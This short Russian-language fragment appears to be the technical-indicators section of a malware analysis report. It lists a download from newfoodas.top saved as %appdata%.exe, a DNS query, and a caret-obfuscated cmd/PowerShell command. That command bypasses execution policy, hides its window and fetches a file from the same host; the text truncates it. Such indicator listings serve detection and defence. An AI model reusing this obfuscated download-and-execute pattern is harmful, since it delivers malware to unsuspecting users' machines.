Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowerSHe^LL.^exe -ExE^CUTI^O^np^Ol^Icy BY^pasS^ ^-NO^p^r^oFile ^-^wIN^dow^St^Yl^E ^hiDDEN (N^EW^-obJ^e^CT ^s^Ys^TEm.n^E^t.wEbC^Li^ENt^)^.^d^Ow^nlO^aD^FIl^E('http://newfoodas....
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "PowerSHe^LL.^exe -ExE^CUTI^O^np^Ol^Icy BY^pasS^ ^-NO^p^r^oFile ^-^wIN^dow^St^Yl^E ^hiDDEN (N^EW^-obJ^e^CT ^s^Ys^TEm.n^E^t.wEbC^Li^ENt^)^.^d^Ow^nlO^aD^FIl^E('http://newfoodas....' (со скрытым окном)